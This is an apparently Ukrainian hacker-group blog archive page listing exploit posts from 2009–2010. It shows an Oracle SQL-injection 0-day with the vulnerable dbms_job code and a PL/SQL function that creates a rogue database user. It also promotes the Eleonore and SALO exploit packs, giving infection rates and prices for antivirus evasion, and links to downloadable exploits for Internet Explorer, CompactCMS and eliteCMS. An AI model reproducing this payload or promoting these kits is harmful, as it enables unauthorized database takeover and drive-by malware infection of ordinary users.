Archive

Archive for the ‘Експлоіти/Exploits’ Category

TARGET: ORACLE. 0day експлойт

April 12th, 2010 dsu 2 comments

Не люблю багато писати, тому все швиденько та по порядку: шукав функцію вразливу до sql-injection під свої потреби, наткнувся на таку в пакеті dbms_job який належить sys користувачеві, функція find_date.

...
30 CUR := DBMS_SQL.OPEN_CURSOR;
31 BEGIN
32
33 DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
34 ' from dual', DBMS_SQL.NATIVE );
...

INTERVAL – вразливий параметр. Але тут проблема: функція не оголошена в пакеті, тобто її можна використовувати тільки всередині пакету, під мої потреби це не підходить, хоча, можливо  комусь і буде потрібно. Але щоб довести справу до переможного кінця,  знайшов процедуру в пакеті яка цю функцію використовує, вона там не одна, але так як мені ця функція не підійшла, я взяв першу ліпшу.

...
134 MYDATE: = FIND_DATE (INTERVAL);
135 IF NOT NO_PARSE THEN
136 PARSE_JOB (WHAT);
137 END IF;
138
...

Створюємо функцію, хоча можна використати і курсор, але я віддаю перевагу старій школі.

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

Ну і власне сам експлойт (під катом):
Read more...

Тест зв’язки експлойтів Eleonore exploits pack

March 30th, 2010 Dimi4 5 comments

Хочу надати вам інформацію про тестування зв’язки експлойтів  Eleonore exploits pack version 1.2. Написана вона автором Exmanoize. В склад зв’язки входять такі експлойти

  • MDAC
  • MS009-02
  • Telnet – Opera
  • Font tags – FireFox
  • PDF collab.getIcon
  • PDF Util.Printf
  • PDF collab.collectEmailInfo
  • DirectX DirectShow
  • Spreadsheet

Середній пробив характерний для звязки:

  • usa: 5-15%
  • mix: 10-25%

Ціни:

  • Власне зв’язка = 700$
  • Чищення від АВ = 50$
  • Ребілд на інший домен = 50$

Як не дивно, та в системі присутні вразливості, далі про них.

Read more…

0-day експлойт для Internet Explorer

March 12th, 2010 Dimi4 5 comments

Експлойт був знайдений на сайті www.topix21century.com. Начинка експлойта завантажувала та виконувала на комп’ютері жертви бінарний файл, який в свою чергу встановлював зєднання з www.topix21century.com.
Наразі вже є готовий експлойт написаний для Metasploit Framework. Успішно спрацював на вказаних продуктах:
– Microsoft Internet Explorer 7, Windows Vista SP2
– Microsoft Internet Explorer 7, Windows XP SP3
– Microsoft Internet Explorer 6, Windows XP SP3

Подивитись вихідний код експлойту.

Експлойт запропонований Moshe Ben Abu (деобфускований та з видаленою malware начинкою):
У звязку з тим, що ESET NOD32 через код сплойту сповіщає що наш блог містить потенційно небезпечний контент – даємо лінк на код експлойту:

http://uasc.org.ua/files/ie6-7exploit.txt

Відео роботи експлойта:

Internet Explorer 0-day Attack from Panda Security on Vimeo.

SALO PACK – Зв’язка сплойтів (exploit pack)

February 19th, 2010 Dimi4 10 comments

SALO PACK © UASC

by n0153r, Dimi4

  • Даний програмний продукт призначений тільки для освітніх цілей. Використання його в будь-якому іншому
  • вигляді може бути розцінено як порушення закону!
  • Заборонено продаж і використання вихідного коду SALO PACK в комерційних цілях

Read more…

Oracle DBMS_SQLHASH.GETHASH exploit (perl)

November 28th, 2009 dsu 2 comments

Написав нескладний exploit, що використовує уразливість в DBMS_SQLHASH.GETHASH. Exploit для роботи потребує sql ін’єкцію в pl / sql процедурі (зазвичай, на Oracle Application server, там і належать такі процедури по дефолту користувачеві з правами, яких нам достатньо). Загалом  можна запитати, навіщо нам exploit, якщо є ін’єкція? Я відповім, що часто в таких процедурах йде простий sql select / update / insert, а в них ми можемо використовувати  тільки простий sql. Даний exploit дозволяє виконати pl / sql, маючи при цьому тільки ін’єкцію у процедурі, яка виконує, скажімо, select і права тільки create_session.

Read more…

CompactCMS Remote Arbitrary File Upload Exploit

October 15th, 2009 Dimi4 4 comments

Писав вже давно, лежало в RoA на античаті,  тепер думаю немає ніякого сенсу зберігати його в приваті.

http://uasc.org.ua/files/compactcms.php.txt
Read more…

накручуємо “nabiraem.ru” система онлайн сертифікатів від Соло

September 9th, 2009 poma 10 comments

привіт =)

я розкажу вам як “підробити” (фух, як грубо сказано) сертифікат від Соло, від nabiraem.ru. А також ми автоматизуємо цей процес, напишемо простенький скрипт на perl.
Read more…

SMF: [Blind SQLinj Member Awards 1.02] exploit

June 14th, 2009 admin 1 comment

SMF ] MemberAwards 1.0.2 exploit
eLwaux(c)uasc && antichat 2009
thx: Grey && mailbrush

Read more…

eliteCMS Exploit

April 19th, 2009 Dimi4 No comments

Вразливості у цій CMS були найдені мною ще 21.12.2008. А експлойт я таки не опублікував на цьому блозі.
публікую :) http://uasc.org.ua/files/eliteCMSexpl.pl.txt
{referrer_detector}

Categories: Експлоіти/Exploits Tags: